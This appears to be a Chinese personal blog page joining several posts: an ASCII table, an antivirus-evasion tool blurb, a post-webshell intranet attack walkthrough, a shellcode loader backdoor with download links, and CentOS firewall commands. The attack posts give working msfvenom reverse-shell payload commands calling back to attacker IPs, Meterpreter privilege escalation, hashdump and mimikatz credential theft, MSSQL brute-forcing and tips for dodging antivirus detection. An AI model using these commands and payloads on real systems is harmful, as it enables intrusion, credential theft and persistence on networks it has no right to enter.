2019年7月15日星期一

chr()码字符对照表

 chr()码字符对照表

ASCII 码 字符 ASCII 码 字符 ASCII 码 字符 ASCII 码 字符
十进位 十六进位 十进位 十六进位 十进位 十六进位 十进位 十六进位
032 20 056 38 8 080 50 P 104 68 h
033 21 ! 057 39 9 081 51 Q 105 69 i
034 22 " 058 3A : 082 52 R 106 6A j
035 23 # 059 3B ; 083 53 S 107 6B k
036 24 $ 060 3C < 084 54 T 108 6C l
037 25 % 061 3D = 085 55 U 109 6D m
038 26 & 062 3E > 086 56 V 110 6E n
039 27 ' 063 3F ? 087 57 W 111 6F o
040 28 ( 064 40 @ 088 58 X 112 70 p
041 29 ) 065 41 A 089 59 Y 113 71 q
042 2A * 066 42 B 090 5A Z 114 72 r
043 2B + 067 43 C 091 5B [ 115 73 s
044 2C , 068 44 D 092 5C \ 116 74 t
045 2D - 069 45 E 093 5D ] 117 75 u
046 2E . 070 46 F 094 5E ^ 118 76 v
047 2F / 071 47 G 095 5F _ 119 77 w
048 30 0 072 48 H 096 60 ` 120 78 x
049 31 1 073 49 I 097 61 a 121 79 y
050 32 2 074 4A J 098 62 b 122 7A z
051 33 3 075 4B K 099 63 c 123 7B {
052 34 4 076 4C L 100 64 d 124 7C |
053 35 5 077 4D M 101 65 e 125 7D }
054 36 6 078 4E N 102 66 f 126 7E ~
055 37 7 079 4F O 103 67 g 127 7F

2018年12月3日星期一

PHANTOM EVASION 2.0

Phantom-Evasion
Phantom-Evasion is an interactive antivirus evasion tool written in python capable to generate (almost) FUD executable even with the most common 32 bit msfvenom payload (lower detection ratio with 64 bit payloads). The aim of this tool is to make antivirus evasion an easy task for pentesters through the use of modules focused on polymorphic code and antivirus sandbox detection techniques. Since version 1.0 Phantom-Evasion also include a post-exploitation section dedicated to persistence and auxiliary modules.

PHANTOM EVASION 2.0

Phantom-Evasion是一个用python编写的交互式防病毒逃避工具,即使使用最常见的32位msfvenom有效负载(64位有效负载的较低检测率),也能生成(几乎)FUD可执行文件。该工具的目的是通过使用专注于多态代码和防病毒沙箱检测技术的模块,使得防病毒逃避成为测试者的一项简单任务。从版本1.0开始,Phantom-Evasion还包括一个专门用于持久性和辅助模块的后期开发部分。

内网渗透

拿到webshell之后我们进行内网渗透,打开msf,我们先生成一个回连木马

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.71.218.172 LPORT=443 -f dll>/root/Desktop/443.dll

生成木马后,我们在菜刀里放入生成的木马,运行,同时打开msf准备回连

use exploit/multi/handler 
set payload windows/meterpreter/reverse_tcp
set LHOST 192.71.218.172
set lport 443
run

提权

background 或 ctrl+z

use exploit/windows/local/ms11_080_afdjoinleaf  
set session 1
run
hashdump      //密码获取
load mimikatz //使用mimikatz
kerberos      //查看解密

新加路由查看子网

route
background 
sessions 
route add 192.168.1.0 255.255.255.0 2
search mssql   //找mssql模块
use auxiliary/scanner/mssql/mssql_login  //使用login模块

show options 

set rhosts 192.168.1.1/24 

set password sa@123
run
show options 
set BEUTEFORCE_SPEED 0
run

端口扫描search portscan 

use   auxiliary/scanner/portscan/tcp  //使用scanner模块
show options 
set RHOSTS 192.168.177.0/24
set ports 139,445,3389  //设置扫描端口

通过C#.NET编程绕过杀软

kali msfcenom 生成C#shellcode

root@kali:~#  msfvenom --arch x64 --platform windows -p windows/x64/meterpreter/reverse_tcp lhost=192.168.2.145 -f csharp > payload.txt


Micropoor_shellcode for payload backdoor


Micropoor_shellcode:

Usage:

Micropoor_shellcode  port host

E.g

Micropoor_shellcode.exe 4444 192.168.1.5

Generate payload:

msfvenom  -p windows/meterpreter/reverse_tcp LHOST=192.168.1.4 LPORT=53 -b '\x00' -f c |grep -v unsigned|sed "s/\"\\\x//g"|sed "s/\\\x//g"|sed "s/\"//g"|sed ':a;N;$!ba;s/\n//g'|sed "s/;//g"

copy shellcode to Micropoor_box.rb








Micropoor_shellcode_x64.exe:
大小: 136192 字节
修改时间: 2019122, 4:40:59
MD5: 304F3C23AD6C57714EDB73D93DA6813D
SHA1: 63B213272AADA91A44F965741E3720EE25CAF7C9
CRC32: 4C2FDE0A
https://drive.google.com/open?id=14HapmSXQtb-HpnXeO3MUEf2utwKfkhOa

Micropoor_shellcode_x86.exe:
大小: 117248 字节
修改时间: 2019122, 2:45:50
MD5: D91444F0A632DEE7F57BAE432CEFFAEC
SHA1: 3D5135FE30FBEFD090B6BBB1F7738DB25B0C2CCC
CRC32: 02BE2833
https://drive.google.com/open?id=15GqGl5KgfVpEkCBItrmqddpDxmXzFG6m

Micropoor_shellcode.rb
大小: 956 字节
修改时间: 2019122, 3:13:17
MD5: 9A82AB2C3A39CABC26FC68864DB07BA1
SHA1: 92D6253C88BA10073CD3AAEE8C38C366DFC7761F
CRC32: 97FA3861
https://drive.google.com/open?id=17uv2Mszu4et3Co1HWQ50mMZiPCL7Ku9F

目前搜集问题总结:

问题1:程序崩溃:
           shellcode分离加载器分为x86,x64,版本。请对应相关的Micropoor_shellcode.exe。
这里需注意,msfvenom的payload其中windows/messagebox,是分x64与x86的,只是msfvenom本身仅提供了x86版本的shellcode。所以如果需运行messagebox,需要调用Micropoor_shellcode_x86.exe。
           程序崩溃2:
           如果生成x86或者x64的shellcode,那么msf本身请对应相关位数的payload。

问题2:被查杀:
           了解用法后,请去掉Micropoor的字符串字样,或者更改其他字符串即可。
         

WINDOWS SERVER 2008-2016 脱域快照

Ntds.dit是主要的AD数据库,包括有关域用户,组和组成员身份的信息。它还包括域中所有用户的密码哈希值。为了进一步保护密码哈希值,使用存储在SYSTEM注册表配置单元中的密钥对这些哈希值进行加密。第二个加密步骤是为了执行密码转储以进行审计,需要两个文件的副本。

2018年8月1日星期三

CentOS7 使用 Firewalld 打开关闭防火墙与端口

firewalld的基本使用

启动: systemctl start firewalld (service firewalld start)
关闭: systemctl stop firewalld  (service firewalld stop)
查看状态: systemctl status firewalld 
开机禁用  : systemctl disable firewalld
开机启用  : systemctl enable firewalld

systemctl是CentOS7的服务管理工具中主要的工具,它融合之前service和chkconfig的功能于一体。

启动一个服务:systemctl start firewalld.service
关闭一个服务:systemctl stop firewalld.service
重启一个服务:systemctl restart firewalld.service
显示一个服务的状态:systemctl status firewalld.service
在开机时启用一个服务:systemctl enable firewalld.service
在开机时禁用一个服务:systemctl disable firewalld.service
查看服务是否开机启动:systemctl is-enabled firewalld.service
查看已启动的服务列表:systemctl list-unit-files|grep enabled
查看启动失败的服务列表:systemctl --failed

配置firewalld-cmd

查看版本: firewall-cmd --version
查看帮助: firewall-cmd --help
显示状态: firewall-cmd --state
查看所有打开的端口: firewall-cmd --zone=public --list-ports
更新防火墙规则: firewall-cmd --reload
查看区域信息:  firewall-cmd --get-active-zones
查看指定接口所属区域: firewall-cmd --get-zone-of-interface=eth0
拒绝所有包:firewall-cmd --panic-on
取消拒绝状态: firewall-cmd --panic-off
查看是否拒绝: firewall-cmd --query-panic

对一个端口的开启/查看/删除操作

添加:  firewall-cmd --zone=public --add-port=444/tcp --permanent    (--permanent永久生效,没有此参数重启后失效)
重新载入:  firewall-cmd --reload
查看:  firewall-cmd --zone=public --query-port=444/tcp
删除:  firewall-cmd --zone=public --remove-port=444/tcp --permanent

学习资源

https://start.me/p/PwlKgn/apt